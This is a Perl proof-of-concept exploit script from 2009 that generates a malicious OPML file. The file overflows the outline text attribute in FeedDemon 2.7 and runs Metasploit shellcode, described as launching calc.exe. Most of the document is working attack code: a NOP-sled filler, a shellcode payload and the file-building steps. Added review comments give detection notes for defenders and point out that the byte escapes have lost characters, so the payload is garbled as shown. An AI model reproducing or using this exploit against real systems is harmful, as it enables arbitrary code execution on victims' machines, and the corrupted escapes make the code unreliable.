# Title : FeedDemon <=2.7 OPML Outline Tag Buffer Overflow Exploit
# Published : 2009-02-09
# Author : cenjan
#!/usr/local/bin/perl
#-----------------------------------------------------------------------------
# FeedDemon version 2.7.0.0 Buffer overFlow
# Reference:
# http://security.bkis.vn/?p=329
# http://www.securityfocus.com/bid/33630/info
# http://secunia.com/advisories/33718/
# Tested in Windows XP Sp2 (English)
# Created by cenjan (xcenjanx@yahoo.com)
# Description: + This code generates an OPML file (feeddemonexploit.opml)
# + Import that file with the Import Feed function of FeedDemon
# + calc.exe will then execute
#-----------------------------------------------------------------------------
# Proof-of-concept generator: builds feeddemonexploit.opml in the current
# directory by concatenating an OPML prefix, a long filler string, a payload
# string and an OPML suffix. Everything between $head and $tail ends up inside
# the `text` attribute of a single <outline> element, which is the field the
# title and the referenced advisories name as overflowing.
#
# NOTE(review): as archived here, the "x.." sequences in the double-quoted
# strings below are plain text (the letter x followed by hex digits), not
# byte escapes; the listing appears to have lost characters in extraction.
#
# Defender notes:
#   - The distinguishing trait of the generated file is one <outline> `text`
#     attribute that is many kilobytes long and holds non-markup data between
#     UCS-2LE encoded OPML tags. An attribute value of that size is a
#     reasonable thing to flag in OPML files before they are imported.
#   - The header says FeedDemon <= 2.7 is affected and that it was tested on
#     Windows XP SP2; consult the advisories listed in the header for fixed
#     versions, and treat OPML from untrusted sources as untrusted input.

# OPML prologue; deliberately ends inside the opening quote of the outline
# element's `text` attribute so the following data becomes the attribute value.
my $head='<opml version="1.1"><body><outline text="';
# Filler: the quoted string repeated 8006 times via the `x` repetition operator.
my $overflow = "x90" x 8006;
# Shellcode by Metasploit
# (The header describes the intended effect as launching calc.exe.)
my $devil=
"x31xC9x83xE9xDExD9xEExD9x74x24xF4x5Bx81x73x13xEC".
"x2Dx36x5Ex83xEBxFCxE2xF4x10xC5x72x5ExECx2DxBD".
"x1BxD0xA6x4Ax5Bx94x2CxD9xD5xA3x35xBDx1xCCx2C".
"xDDx17x67x19xBDx5Fx2x1CxF6xC7x40xA9xF6x2AxEB".
"xECxFCx53xEDxEFxDDxAAxD7x79x12x5Ax99xC8xBDx1".
"xC8x2CxDDx38x67x21x7DxD5xB3x31x37xB5x67x31xBD".
"x5Fx7xA4x6Ax7AxE8xEEx7x9Ex88xA6x76x6Ex69xED".
"x4Ex52x67x6Dx3AxD5x9Cx31x9BxD5x84x25xDDx57x67".
"xADx86x5ExECx2DxBDx36xD0x72x7xA8x8Cx7BxBFxA6".
"x6FxEDx4DxEx84xDDxBCx5AxB3x45xAExA0x66x23x61".
"xA1xBx4Ex57x32x8Fx2Dx36x5Ex90x90x90x90x90x90".
"x90x90xEDx1Ex94x7Cx90x90x90x90x90x90x90x90x90".
"x90x90x90x90x90x89xE1xFExCDxFExCDxFExCDxFExCD".
"xFExCDxFExCDx89xCCxFFxE4";
# OPML epilogue: closes the attribute and element, adds a nested outline entry
# and closes the document so the file still parses as OPML.
my $tail='"><outline text="BKIS" title="SVRT" type="rss" xmlUrl="http://milw0rm.com/rss.php"/></outline></body></opml>';
# The file is written in four passes because the markup and the middle section
# use different encodings. Each pass reopens the same path.
# NOTE(review): every open() below uses a bareword handle and its return value
# is never checked, so a failed open is silently ignored; the first and third
# also use the two-argument form.
# Pass 1: create/truncate the file and write a short marker string with no
# encoding layer (presumably meant as a UTF-16LE byte-order mark; see the note
# at the top about the literal text).
open (f,'>feeddemonexploit.opml');
print f "xffxfe";
close(f);
# Pass 2: append the OPML prologue through the ucs-2le encoding layer.
open (f,'>>:encoding(ucs-2le)','feeddemonexploit.opml');
print f $head;
close(f);
# Pass 3: append filler and payload with no encoding layer, so they are
# written as-is rather than widened to two bytes per character.
open (f,'>>feeddemonexploit.opml');
print f $overflow;
print f $devil;
close(f);
# Pass 4: append the OPML epilogue, again through the ucs-2le layer.
open (f,'>>:encoding(ucs-2le)','feeddemonexploit.opml');
print f $tail;
close (f);
# Status message to STDOUT; printed unconditionally, even if the writes failed.
print "Create exploit file successfully!";